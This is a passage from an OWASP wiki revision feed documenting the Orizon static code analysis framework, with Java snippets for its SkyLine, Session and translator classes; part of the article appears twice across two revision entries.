In the following picture, the Owasp Orizon version 1.0 architecture is shown. As you may see, the framework is organized in engines that perform tasks over the source code and a block of tools that are deployed out of the box in order to use the APIs in a real world static analysis. &lt;br /&gt;
&lt;br /&gt;
[[Image:Owasp_Orizon_Architecture_v1.0.png|400px|The Owasp Orizon v1.0 architecture]]&lt;br /&gt;
&lt;br /&gt;
With all such elements, a developer can be scared to use the framework; that's why a special entity called SkyLine was created. Before going further into SkyLine analysis, it's very important to understand all the elements Orizon is made of. &lt;br /&gt;
&lt;br /&gt;
=== Your personal butler: the SkyLine class ===&lt;br /&gt;
Named '''core''' in the architectural picture, the SkyLine object is one of the most valuable services in Orizon version 1.0. &lt;br /&gt;
&lt;br /&gt;
The idea behind SkyLine is simple: as the Orizon architecture becomes wider, regular developers may be scared about understanding a lot of APIs in order to build their security tool, so we can help them providing  &amp;quot;per service&amp;quot; support. &lt;br /&gt;
&lt;br /&gt;
Using SkyLine object, developers can request services from the Orizon framework waiting for their accomplishment. &lt;br /&gt;
&lt;br /&gt;
The main SkyLine input is: &lt;br /&gt;
&lt;br /&gt;
 '''public boolean launch(String service)'''&lt;br /&gt;
&lt;br /&gt;
Passing the requested service as string parameter, the calling program will receive a boolean true return value if the service can be accomplished or a false value otherwise. &lt;br /&gt;
&lt;br /&gt;
The service name is compared to the ones understood by the framework: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''private int goodService(String service) {&lt;br /&gt;
 '''  int ret = -1;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;init&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_INIT_FRAMEWORK;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;translate&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_INIT_TRANSLATE;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;static_analysis&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_STATIC_ANALYSIS;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;score&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_SCORE;&lt;br /&gt;
 '''  return ret;&lt;br /&gt;
 '''}&lt;br /&gt;
&lt;br /&gt;
The secondary feature introduced in this first major framework release is the support for command line option given to the user. &lt;br /&gt;
&lt;br /&gt;
If the calling program passes command line option to Orizon framework using SkyLine, the framework will be tuned accordingly to the given values. &lt;br /&gt;
&lt;br /&gt;
This example will explain better: &lt;br /&gt;
&lt;br /&gt;
 '''public static void main(String[] args) {&lt;br /&gt;
 '''   String fileName = &amp;quot;&amp;quot;;&lt;br /&gt;
 '''   OldRecipe r;&lt;br /&gt;
 '''   DefaultLibrary dl;&lt;br /&gt;
 '''&lt;br /&gt;
 '''   SkyLine skyLine = new SkyLine(args);&lt;br /&gt;
&lt;br /&gt;
That's all folks! Internally, the SkyLine constructor, when it creates a code review session,  uses the values it was able to understand from command line. &lt;br /&gt;
&lt;br /&gt;
The command line format must follow this convention &lt;br /&gt;
&lt;br /&gt;
 ''' -o orizon_key=value&lt;br /&gt;
or the long format&lt;br /&gt;
 ''' --orizon orizon_key=value&lt;br /&gt;
&lt;br /&gt;
And these are the keys that the framework cares about:&lt;br /&gt;
* &amp;quot;input-name&amp;quot;&lt;br /&gt;
* &amp;quot;input-kind&amp;quot;&lt;br /&gt;
* &amp;quot;working-dir&amp;quot;&lt;br /&gt;
* &amp;quot;lang&amp;quot;&lt;br /&gt;
* &amp;quot;recurse&amp;quot;&lt;br /&gt;
* &amp;quot;output-format&amp;quot;&lt;br /&gt;
* &amp;quot;scan-type&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
The org.owasp.orizon.Cons class contains a detailed section about these keys with some comments and with their default value.	&lt;br /&gt;
&lt;br /&gt;
The only side effect is that calling program can use -o flag for its purpose.&lt;br /&gt;
 &lt;br /&gt;
SkyLine is contained in the org.owasp.orizon package.&lt;br /&gt;
&lt;br /&gt;
=== Give me something to remind: the Session class ===&lt;br /&gt;
Another big feature introduced in Owasp Orizon version 1.0 is the code review session concept. One of the missing features in earlier versions was the capability to track the state of the code review process. &lt;br /&gt;
&lt;br /&gt;
A Session class instance contains all the properties specified using SkyLine and it is their owner giving access to properties upon request. It contains a SessionInfo array containing information about each file being reviewed. &lt;br /&gt;
&lt;br /&gt;
Ideally, a user tool will never call Session directly, but it must use SkyLine as interface. Of course anyone is free to override this suggestion. &lt;br /&gt;
&lt;br /&gt;
Looking at the launch() method code, inside the SkyLine class, you can look how session instance is prompted to execute services. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''public boolean launch(String service) {&lt;br /&gt;
 '''   int code, stats;&lt;br /&gt;
 '''   boolean ret = false;&lt;br /&gt;
 '''&lt;br /&gt;
 '''   if ( (code = goodService(service)) == -1)&lt;br /&gt;
 '''      return log.error(&amp;quot;unknown service: &amp;quot; + service);&lt;br /&gt;
 '''   switch (code) {&lt;br /&gt;
 '''       // init service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_INIT_FRAMEWORK:&lt;br /&gt;
 '''            ret = session.init();&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       // translation service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_INIT_TRANSLATE:&lt;br /&gt;
 '''            stats = session.collectStats();&lt;br /&gt;
 '''            if (stats &amp;gt; 0) {&lt;br /&gt;
 '''               log.warning(stats + &amp;quot; files failed in collecting statistics.&amp;quot;);&lt;br /&gt;
 '''               ret = false;&lt;br /&gt;
 '''            } else&lt;br /&gt;
 '''               ret = true;&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       // static analysis service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_STATIC_ANALYSIS:&lt;br /&gt;
 '''            ret = session.staticReview();&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       // score service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_SCORE:&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       default:&lt;br /&gt;
 '''            return log.error(&amp;quot;unknown service: &amp;quot; + service);&lt;br /&gt;
 '''       }&lt;br /&gt;
 '''       return ret;&lt;br /&gt;
 '''}&lt;br /&gt;
&lt;br /&gt;
Internally, the Session instance will ask each SessionInfo object to execute services. Let us consider the Session class method that executes the static analysis service. &lt;br /&gt;
&lt;br /&gt;
 '''/**&lt;br /&gt;
 '''  * Starts a static analysis over the files being reviewed&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * @return &amp;lt;i&amp;gt;true&amp;lt;/i&amp;gt; if static analysis can be performed or &amp;lt;i&amp;gt;false&amp;lt;/i&amp;gt;&lt;br /&gt;
 '''  *         if one or more files fail being analyzed.&lt;br /&gt;
 '''  */&lt;br /&gt;
 '''public boolean staticReview() {&lt;br /&gt;
 '''   boolean ret = true;&lt;br /&gt;
 '''   if (!active)&lt;br /&gt;
 '''      return log.error(&amp;quot;can't perform a static analysis over an inactive session.&amp;quot;);&lt;br /&gt;
 '''   for (int i = 0; i &amp;lt; sessions.length; i++) {&lt;br /&gt;
 '''       if (! sessions[i].staticReview())&lt;br /&gt;
 '''          ret = false;&lt;br /&gt;
 '''   }&lt;br /&gt;
 '''   return ret;&lt;br /&gt;
 '''}&lt;br /&gt;
&lt;br /&gt;
Where sessions variable is declared as:&lt;br /&gt;
 '''private SessionInfo[] sessions;&lt;br /&gt;
&lt;br /&gt;
As you may see, the Session object delegates service accomplishment to SessionInfo once collecting the final results. &lt;br /&gt;
&lt;br /&gt;
In fact, SessionInfo objects are the ones talking with Orizon internals performing the real work. &lt;br /&gt;
&lt;br /&gt;
The following method is stolen from org.owasp.orizon.SessionInfo class. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''/**&lt;br /&gt;
 '''  * Perform a static analysis over the given file&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * A full static analysis is a mix from:&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  *  * local analysis (control flow)&lt;br /&gt;
 '''  *  * global analysis (call graph)&lt;br /&gt;
 '''  *  * taint propagation&lt;br /&gt;
 '''  *  * statistics&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * @return &amp;lt;i&amp;gt;true&amp;lt;/i&amp;gt; if the file being reviewed doesn't violate any&lt;br /&gt;
 '''  *         security check, &amp;lt;i&amp;gt;false&amp;lt;/i&amp;gt; otherwise.&lt;br /&gt;
 '''  */&lt;br /&gt;
 '''  public boolean staticReview() {&lt;br /&gt;
 '''     boolean ret = false;&lt;br /&gt;
 '''     s = new Source(getStatFileName());&lt;br /&gt;
 '''     ret = s.analyzeStats();&lt;br /&gt;
 '''     ...&lt;br /&gt;
 '''     return ret;&lt;br /&gt;
 '''  }&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== The Translation Factory ===&lt;br /&gt;
One of the Owasp Orizon goals is to be independent from the source language being analyzed. This means that Owasp Orizon will support: &lt;br /&gt;
* Java&lt;br /&gt;
* C, C++&lt;br /&gt;
* C#&lt;br /&gt;
* Perl&lt;br /&gt;
* ...&lt;br /&gt;
Such support is granted using an intermediate file format to describe the source code and used to apply the security checks. Such format is XML language. &lt;br /&gt;
&lt;br /&gt;
A source code, before static analysis is started, is translated into XML. Starting from version 1.0, each source code is translated in 4 XML files: &lt;br /&gt;
&lt;br /&gt;
* an XML file containing statistical information&lt;br /&gt;
* an XML file containing variables tracking information&lt;br /&gt;
* an XML file containing program control flow (local analysis)&lt;br /&gt;
* an XML file containing call graph (global analysis)&lt;br /&gt;
&lt;br /&gt;
At the time this document is written (Owasp Orizon v1.0pre1, September 2008), only the Java programming language is supported, however other programming language will follow soon. &lt;br /&gt;
&lt;br /&gt;
Translation phase is requested from org.owasp.orizon.SessionInfo.inspect() method. Depending on the source file language, the appropriate Translator is called and the scan() method is called. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ''' /**&lt;br /&gt;
 '''   * Inspects the source code, building AST trees&lt;br /&gt;
 '''   * @return&lt;br /&gt;
 '''   */&lt;br /&gt;
 '''   public boolean inspect() {&lt;br /&gt;
 '''      boolean ret = false;&lt;br /&gt;
 '''      switch (language) {&lt;br /&gt;
 '''         case Cons.O_JAVA:&lt;br /&gt;
 '''             t = new JavaTranslator();&lt;br /&gt;
 '''             if (!t.scan(getInFileName())) &lt;br /&gt;
 '''                return log.error(&amp;quot;can't scan &amp;quot; + getInFileName() + &amp;quot;.&amp;quot;);&lt;br /&gt;
 '''                ret = true;&lt;br /&gt;
 '''         break;&lt;br /&gt;
 '''         default:&lt;br /&gt;
 '''             log.error(&amp;quot;can't inspect language: &amp;quot; + Cons.name(language));&lt;br /&gt;
 '''         break;&lt;br /&gt;
 '''      }&lt;br /&gt;
 '''      return ret;&lt;br /&gt;
 '''   }&lt;br /&gt;
&lt;br /&gt;
Scan method is an abstract method defined in org.owasp.orizon.translator.DefaultTranslator class and declared as the following: &lt;br /&gt;
&lt;br /&gt;
 ''' public abstract boolean scan(String in);&lt;br /&gt;
&lt;br /&gt;
Every class implementing DefaultTranslator must implement how to scan the source file and build ASTs in this method. &lt;br /&gt;
&lt;br /&gt;
Aside from scan() method, there are four abstract method needful to create XML input files. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ''' public abstract boolean statService(String in, String out);&lt;br /&gt;
 ''' public abstract boolean callGraphService(String in, String out);&lt;br /&gt;
 ''' public abstract boolean dataFlowService(String in, String out);&lt;br /&gt;
 ''' public abstract boolean controlFlowService(String in, String out);&lt;br /&gt;
&lt;br /&gt;
All these methods are called in the translator() method, the one implemented directly from DefaultTranslator class. &lt;br /&gt;
&lt;br /&gt;
 ''' public final boolean translate(String in, String out, int service) {&lt;br /&gt;
 '''    if (!isGoodService(service))&lt;br /&gt;
 '''       return false;&lt;br /&gt;
 '''    if (!scanned)&lt;br /&gt;
 '''       if (!scan(in))&lt;br /&gt;
 '''          return log.error(in+ &amp;quot;: scan has been failed&amp;quot;);&lt;br /&gt;
 '''    switch (service) {&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_STAT:&lt;br /&gt;
 '''          return statService(in, out);&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_CF:&lt;br /&gt;
 '''          return controlFlowService(in, out);&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_CG:&lt;br /&gt;
 '''          return callGraphService(in, out);&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_DF:&lt;br /&gt;
 '''          return dataFlowService(in, out);&lt;br /&gt;
 '''      default:&lt;br /&gt;
 '''          return log.error(&amp;quot;unknown service code&amp;quot;);&lt;br /&gt;
 '''    }&lt;br /&gt;
 ''' }&lt;br /&gt;
&lt;br /&gt;
So, when a language specific translator is prompted for translate() method, this recalls the language specific service methods. &lt;br /&gt;
&lt;br /&gt;
Every translator contains as private field, a language specific scanner containing ASTs to be used in input file generation. &lt;br /&gt;
&lt;br /&gt;
Consider org.owasp.orizon.translator.java.JavaTranslator class, it is declared as follows: &lt;br /&gt;
&lt;br /&gt;
 ''' public class JavaTranslator extends DefaultTranslator {&lt;br /&gt;
 '''   static SourcePositions positions;&lt;br /&gt;
 '''   private JavaScanner j;&lt;br /&gt;
 '''   ...&lt;br /&gt;
&lt;br /&gt;
JavaScanner is a class from org.owasp.orizon.translator.java package and it uses Sun JDK 6 Compiler API to scan a Java file creating in memory ASTs. Trees are created in scan() method, implemented for Java source language as follow: &lt;br /&gt;
&lt;br /&gt;
 ''' public final boolean scan(String in) {&lt;br /&gt;
 '''    boolean ret = false;&lt;br /&gt;
 '''    String[] parms = { in };&lt;br /&gt;
 '''    Trees trees;&lt;br /&gt;
 ''' 		&lt;br /&gt;
 '''    JavaCompiler compiler = ToolProvider.getSystemJavaCompiler();&lt;br /&gt;
 '''    if (compiler == null) &lt;br /&gt;
 '''       return log.error(&amp;quot;I can't find a suitable JAVA compiler. Is a JDK installed?&amp;quot;);&lt;br /&gt;
 ''' 	&lt;br /&gt;
 '''    DiagnosticCollector&amp;lt;JavaFileObject&amp;gt; diagnostics = new DiagnosticCollector&amp;lt;JavaFileObject&amp;gt;();&lt;br /&gt;
 '''    StandardJavaFileManager fileManager = compiler.getStandardFileManager(diagnostics, null, null);&lt;br /&gt;
 '''    Iterable&amp;lt;? extends JavaFileObject&amp;gt; fileObjects = fileManager.getJavaFileObjects(parms);&lt;br /&gt;
 '''&lt;br /&gt;
 '''    JavacTask task = (com.sun.source.util.JavacTask) compiler.getTask(null,fileManager, diagnostics, null, null, fileObjects);&lt;br /&gt;
 '''&lt;br /&gt;
 '''    try {&lt;br /&gt;
 '''        trees = Trees.instance(task);&lt;br /&gt;
 '''        positions = trees.getSourcePositions();&lt;br /&gt;
 '''        Iterable&amp;lt;? extends CompilationUnitTree&amp;gt; asts = task.parse();&lt;br /&gt;
 '''        for (CompilationUnitTree ast : asts) {&lt;br /&gt;
 '''            j = new JavaScanner(positions, ast);&lt;br /&gt;
 '''            j.scan(ast, null);&lt;br /&gt;
 '''        }&lt;br /&gt;
 '''        scanned = true;&lt;br /&gt;
 '''        return true;&lt;br /&gt;
 '''    } catch (IOException e) {&lt;br /&gt;
 '''        return log.fatal(&amp;quot;an exception occured while translate &amp;quot; + in + &amp;quot;: &amp;quot; +e.getLocalizedMessage());&lt;br /&gt;
 '''    }&lt;br /&gt;
 ''' }&lt;br /&gt;
&lt;br /&gt;
===Statistical Gathering ===&lt;br /&gt;
To implement statistic information gathering, DefaultTranslator abstract method statService() must be implemented. In the following example, the method is the JavaTranslator's. Statistics information is stored in the JavaScanner object itself and retrieved by getStats() method. &lt;br /&gt;
&lt;br /&gt;
 ''' public final boolean statService(String in, String out) {&lt;br /&gt;
 '''    boolean ret = false;&lt;br /&gt;
 ''' 		&lt;br /&gt;
 '''    if (!scanned)&lt;br /&gt;
 '''       return log.error(in + &amp;quot;: call scan() before asking translation...&amp;quot;);&lt;br /&gt;
 '''    log.debug(&amp;quot;. Entering statService(): collecting stats for: &amp;quot; + in);&lt;br /&gt;
 '''    try {&lt;br /&gt;
 '''        createXmlFile(out);&lt;br /&gt;
 '''        xmlInit();&lt;br /&gt;
 '''        xml(&amp;quot;&amp;lt;source name=\&amp;quot;&amp;quot; + in+&amp;quot;\&amp;quot; &amp;gt;&amp;quot;);&lt;br /&gt;
 '''        xml(j.getStats());&lt;br /&gt;
 '''        xml(&amp;quot;&amp;lt;/source&amp;gt;&amp;quot;);&lt;br /&gt;
 '''        xmlEnd();&lt;br /&gt;
 '''&lt;br /&gt;
 '''    } catch (FileNotFoundException e) {&lt;br /&gt;
 '''    } catch (UnsupportedEncodingException e) {&lt;br /&gt;
 '''    } catch (IOException e) {&lt;br /&gt;
 '''        ret = log.error(&amp;quot;an exception occured: &amp;quot; + e.getMessage());&lt;br /&gt;
 '''    }&lt;br /&gt;
 '''    ret = true;&lt;br /&gt;
 '''    log.debug(&amp;quot;stats written into: &amp;quot; + out);&lt;br /&gt;
 '''    log.debug(&amp;quot;. Leaving statService()&amp;quot;);&lt;br /&gt;
 '''    return ret;&lt;br /&gt;
 ''' }&lt;br /&gt;
&lt;br /&gt;
== Reference == &lt;br /&gt;
&lt;br /&gt;
To anyone interested in Owasp Orizon framework, you can use the following links:&lt;br /&gt;
* main page @ Owasp: [[::Category:OWASP_Orizon_Project|OWASP Orizon Project]]&lt;br /&gt;
* main site @ SourceForge: [http://orizon.sourceforge.net http://orizon.sourceforge.net]&lt;br /&gt;
* blog: [http://orizon.sourceforget.net/blog http://orizon.sourceforge.net/blog]&lt;br /&gt;
* author page @ Owasp: [http://www.owasp.org/index.php/User:Thesp0nge http://www.owasp.org/index.php/User:Thesp0nge]&lt;br /&gt;
&lt;br /&gt;
You can drop also a line to Orizon author: [mailto:thesp0nge@owasp.org thesp0nge@owasp.org]&lt;br /&gt;
 '''foo'''&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=The_Owasp_Orizon_Framework&amp;diff=61246</id>
		<title>The Owasp Orizon Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=The_Owasp_Orizon_Framework&amp;diff=61246"/>
				<updated>2009-05-22T13:07:10Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Reference */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
A lot of open source projects exist in the wild, performing static code review analysis. This is good, it means that source code testing for security issues is becoming a constraint. &lt;br /&gt;
&lt;br /&gt;
Such tools bring a lot of valuable points:&lt;br /&gt;
* community support&lt;br /&gt;
* source code freely available to anyone&lt;br /&gt;
* costs&lt;br /&gt;
&lt;br /&gt;
On the other side, these tools don't share the most valuable point among them: the security knowledge. All these tools have their own security library, containing a lot of checks, without sharing such knowledge. &lt;br /&gt;
&lt;br /&gt;
In 2006, the Owasp Orizon project wass born to provide a common underlying layer to all opensource projects concerning static analysis. &lt;br /&gt;
&lt;br /&gt;
Orizon project includes:&lt;br /&gt;
* a set of APIs that developers can use to build their own security tool performing static analysis.&lt;br /&gt;
* a security library with checks to apply to source code.&lt;br /&gt;
* a tool, Milk, which is able to static analyze a source code using Orizon Framework.&lt;br /&gt;
&lt;br /&gt;
== The Owasp Orizon Architecture ==&lt;br /&gt;
In the following picture, the Owasp Orizon version 1.0 architecture is shown. As you may see, the framework is organized in engines that perform tasks over the source code and a block of tools that are deployed out of the box in order to use the APIs in a real world static analysis. &lt;br /&gt;
&lt;br /&gt;
[[Image:Owasp_Orizon_Architecture_v1.0.png|400px|The Owasp Orizon v1.0 architecture]]&lt;br /&gt;
&lt;br /&gt;
With all such elements, a developer can be scared to use the framework; that's why a special entity called SkyLine was created. Before going further into SkyLine analysis, it's very important to understand all the elements Orizon is made of. &lt;br /&gt;
&lt;br /&gt;
=== Your personal butler: the SkyLine class ===&lt;br /&gt;
Named '''core''' in the architectural picture, the SkyLine object is one of the most valuable services in Orizon version 1.0. &lt;br /&gt;
&lt;br /&gt;
The idea behind SkyLine is simple: as the Orizon architecture becomes wider, regular developers may be scared about understanding a lot of APIs in order to build their security tool, so we can help them providing  &amp;quot;per service&amp;quot; support. &lt;br /&gt;
&lt;br /&gt;
Using SkyLine object, developers can request services from the Orizon framework waiting for their accomplishment. &lt;br /&gt;
&lt;br /&gt;
The main SkyLine input is: &lt;br /&gt;
&lt;br /&gt;
 '''public boolean launch(String service)'''&lt;br /&gt;
&lt;br /&gt;
Passing the requested service as string parameter, the calling program will receive a boolean true return value if the service can be accomplished or a false value otherwise. &lt;br /&gt;
&lt;br /&gt;
The service name is compared to the ones understood by the framework: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''private int goodService(String service) {&lt;br /&gt;
 '''  int ret = -1;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;init&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_INIT_FRAMEWORK;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;translate&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_INIT_TRANSLATE;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;static_analysis&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_STATIC_ANALYSIS;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;score&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_SCORE;&lt;br /&gt;
 '''  return ret;&lt;br /&gt;
 '''}&lt;br /&gt;
&lt;br /&gt;
The secondary feature introduced in this first major framework release is the support for command line option given to the user. &lt;br /&gt;
&lt;br /&gt;
If the calling program passes command line option to Orizon framework using SkyLine, the framework will be tuned accordingly to the given values. &lt;br /&gt;
&lt;br /&gt;
This example will explain better: &lt;br /&gt;
&lt;br /&gt;
 '''public static void main(String[] args) {&lt;br /&gt;
 '''   String fileName = &amp;quot;&amp;quot;;&lt;br /&gt;
 '''   OldRecipe r;&lt;br /&gt;
 '''   DefaultLibrary dl;&lt;br /&gt;
 '''&lt;br /&gt;
 '''   SkyLine skyLine = new SkyLine(args);&lt;br /&gt;
&lt;br /&gt;
That's all folks! Internally, the SkyLine constructor, when it creates a code review session,  uses the values it was able to understand from command line. &lt;br /&gt;
&lt;br /&gt;
The command line format must follow this convention &lt;br /&gt;
&lt;br /&gt;
 ''' -o orizon_key=value&lt;br /&gt;
or the long format&lt;br /&gt;
 ''' --orizon orizon_key=value&lt;br /&gt;
&lt;br /&gt;
And these are the keys that the framework cares about:&lt;br /&gt;
* &amp;quot;input-name&amp;quot;&lt;br /&gt;
* &amp;quot;input-kind&amp;quot;&lt;br /&gt;
* &amp;quot;working-dir&amp;quot;&lt;br /&gt;
* &amp;quot;lang&amp;quot;&lt;br /&gt;
* &amp;quot;recurse&amp;quot;&lt;br /&gt;
* &amp;quot;output-format&amp;quot;&lt;br /&gt;
* &amp;quot;scan-type&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
The org.owasp.orizon.Cons class contains a detailed section about these keys with some comments and with their default value.	&lt;br /&gt;
&lt;br /&gt;
The only side effect is that calling program can use -o flag for its purpose.&lt;br /&gt;
 &lt;br /&gt;
SkyLine is contained in the org.owasp.orizon package.&lt;br /&gt;
&lt;br /&gt;
=== Give me something to remind: the Session class ===&lt;br /&gt;
Another big feature introduced in Owasp Orizon version 1.0 is the code review session concept. One of the missing features in earlier versions was the capability to track the state of the code review process. &lt;br /&gt;
&lt;br /&gt;
A Session class instance contains all the properties specified using SkyLine and it is their owner giving access to properties upon request. It contains a SessionInfo array containing information about each file being reviewed. &lt;br /&gt;
&lt;br /&gt;
Ideally, a user tool will never call Session directly, but it must use SkyLine as interface. Of course anyone is free to override this suggestion. &lt;br /&gt;
&lt;br /&gt;
Looking at the launch() method code, inside the SkyLine class, you can look how session instance is prompted to execute services. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''public boolean launch(String service) {&lt;br /&gt;
 '''   int code, stats;&lt;br /&gt;
 '''   boolean ret = false;&lt;br /&gt;
 '''&lt;br /&gt;
 '''   if ( (code = goodService(service)) == -1)&lt;br /&gt;
 '''      return log.error(&amp;quot;unknown service: &amp;quot; + service);&lt;br /&gt;
 '''   switch (code) {&lt;br /&gt;
 '''       // init service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_INIT_FRAMEWORK:&lt;br /&gt;
 '''            ret = session.init();&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       // translation service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_INIT_TRANSLATE:&lt;br /&gt;
 '''            stats = session.collectStats();&lt;br /&gt;
 '''            if (stats &amp;gt; 0) {&lt;br /&gt;
 '''               log.warning(stats + &amp;quot; files failed in collecting statistics.&amp;quot;);&lt;br /&gt;
 '''               ret = false;&lt;br /&gt;
 '''            } else&lt;br /&gt;
 '''               ret = true;&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       // static analysis service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_STATIC_ANALYSIS:&lt;br /&gt;
 '''            ret = session.staticReview();&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       // score service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_SCORE:&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       default:&lt;br /&gt;
 '''            return log.error(&amp;quot;unknown service: &amp;quot; + service);&lt;br /&gt;
 '''       }&lt;br /&gt;
 '''       return ret;&lt;br /&gt;
 '''}&lt;br /&gt;
&lt;br /&gt;
Internally, the Session instance will ask each SessionInfo object to execute services. Let us consider the Session class method that executes the static analysis service. &lt;br /&gt;
&lt;br /&gt;
 '''/**&lt;br /&gt;
 '''  * Starts a static analysis over the files being reviewed&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * @return &amp;lt;i&amp;gt;true&amp;lt;/i&amp;gt; if static analysis can be performed or &amp;lt;i&amp;gt;false&amp;lt;/i&amp;gt;&lt;br /&gt;
 '''  *         if one or more files fail being analyzed.&lt;br /&gt;
 '''  */&lt;br /&gt;
 '''public boolean staticReview() {&lt;br /&gt;
 '''   boolean ret = true;&lt;br /&gt;
 '''   if (!active)&lt;br /&gt;
 '''      return log.error(&amp;quot;can't perform a static analysis over an inactive session.&amp;quot;);&lt;br /&gt;
 '''   for (int i = 0; i &amp;lt; sessions.length; i++) {&lt;br /&gt;
 '''       if (! sessions[i].staticReview())&lt;br /&gt;
 '''          ret = false;&lt;br /&gt;
 '''   }&lt;br /&gt;
 '''   return ret;&lt;br /&gt;
 '''}&lt;br /&gt;
&lt;br /&gt;
Where sessions variable is declared as:&lt;br /&gt;
 '''private SessionInfo[] sessions;&lt;br /&gt;
&lt;br /&gt;
As you may see, the Session object delegates service accomplishment to SessionInfo once collecting the final results. &lt;br /&gt;
&lt;br /&gt;
In fact, SessionInfo objects are the ones talking with Orizon internals performing the real work. &lt;br /&gt;
&lt;br /&gt;
The following method is stolen from org.owasp.orizon.SessionInfo class. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''/**&lt;br /&gt;
 '''  * Perform a static analysis over the given file&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * A full static analysis is a mix from:&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  *  * local analysis (control flow)&lt;br /&gt;
 '''  *  * global analysis (call graph)&lt;br /&gt;
 '''  *  * taint propagation&lt;br /&gt;
 '''  *  * statistics&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * @return &amp;lt;i&amp;gt;true&amp;lt;/i&amp;gt; if the file being reviewed doesn't violate any&lt;br /&gt;
 '''  *         security check, &amp;lt;i&amp;gt;false&amp;lt;/i&amp;gt; otherwise.&lt;br /&gt;
 '''  */&lt;br /&gt;
 '''  public boolean staticReview() {&lt;br /&gt;
 '''     boolean ret = false;&lt;br /&gt;
 '''     s = new Source(getStatFileName());&lt;br /&gt;
 '''     ret = s.analyzeStats();&lt;br /&gt;
 '''     ...&lt;br /&gt;
 '''     return ret;&lt;br /&gt;
 '''  }&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== The Translation Factory ===&lt;br /&gt;
One of the Owasp Orizon goals is to be independent from the source language being analyzed. This means that Owasp Orizon will support: &lt;br /&gt;
* Java&lt;br /&gt;
* C, C++&lt;br /&gt;
* C#&lt;br /&gt;
* Perl&lt;br /&gt;
* ...&lt;br /&gt;
Such support is granted using an intermediate file format to describe the source code and used to apply the security checks. Such format is XML language. &lt;br /&gt;
&lt;br /&gt;
A source code, before static analysis is started, is translated into XML. Starting from version 1.0, each source code is translated in 4 XML files: &lt;br /&gt;
&lt;br /&gt;
* an XML file containing statistical information&lt;br /&gt;
* an XML file containing variables tracking information&lt;br /&gt;
* an XML file containing program control flow (local analysis)&lt;br /&gt;
* an XML file containing call graph (global analysis)&lt;br /&gt;
&lt;br /&gt;
At the time this document is written (Owasp Orizon v1.0pre1, September 2008), only the Java programming language is supported, however other programming language will follow soon. &lt;br /&gt;
&lt;br /&gt;
Translation phase is requested from org.owasp.orizon.SessionInfo.inspect() method. Depending on the source file language, the appropriate Translator is called and the scan() method is called. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ''' /**&lt;br /&gt;
 '''   * Inspects the source code, building AST trees&lt;br /&gt;
 '''   * @return&lt;br /&gt;
 '''   */&lt;br /&gt;
 '''   public boolean inspect() {&lt;br /&gt;
